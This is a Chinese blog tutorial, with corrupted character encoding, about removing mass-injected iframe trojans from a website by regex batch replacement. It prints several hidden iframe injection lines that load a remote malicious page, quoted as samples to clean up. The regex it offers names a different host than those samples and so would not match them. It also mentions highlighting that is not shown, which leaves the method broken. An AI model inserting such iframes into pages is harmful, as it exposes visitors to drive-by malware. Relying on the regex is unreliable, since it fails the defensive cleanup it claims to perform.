網(wǎng)站被批量掛馬是經(jīng)常遇到的事情，一般用批量替換工具很方便就可以批量刪除相關(guān)代碼，但是如果一個(gè)網(wǎng)站里面每個(gè)頁(yè)面都被放置了木馬，而且代碼還都不一樣。這種情況如何處理？

下面我們一起來(lái)學(xué)習(xí)一下批量使用替換工具刪除相關(guān)木馬：

因?yàn)闆](méi)有一個(gè)頁(yè)面掛的馬是相同的，所以根本刪不掉。前幾天我的一個(gè)朋友就遇到了這個(gè)問(wèn)題。他訴苦道服務(wù)器上一個(gè)網(wǎng)站被批量掛了木馬，仔細(xì)一看居然每個(gè)頁(yè)面掛的木馬都不一樣。

我檢查了一下是類(lèi)似這樣的情況：

頁(yè)面一的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>

頁(yè)面二的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>

頁(yè)面三的木馬是：

<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>

……

仔細(xì)看，雖然每個(gè)頁(yè)面上掛的木馬不同，但是還是有一定規(guī)律的。

這時(shí)候，我就在郁悶了，要是能有一個(gè)支持正則的批量替換工具就好了。還好補(bǔ)天的areone幫忙，給我介紹了一個(gè)小工具，恰恰可以滿足這個(gè)要求。

打開(kāi)AFR工具，選擇批量替換：

搜索內(nèi)容部分填寫(xiě)：

<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=\d{4} naMe=2 boRdeR=0></ifRame>

替換為空 即可。

注意上面語(yǔ)句中紅色部分，就是正則表達(dá)式了。通過(guò)這種方法，就可以批量對(duì)木馬進(jìn)行刪除了。

很快，清除了4百多個(gè)頁(yè)面上的木馬。大功告成。

正則表達(dá)式在平時(shí)技術(shù)方面的應(yīng)用中用的很多，后面我也會(huì)給大家找一些這方面的教材。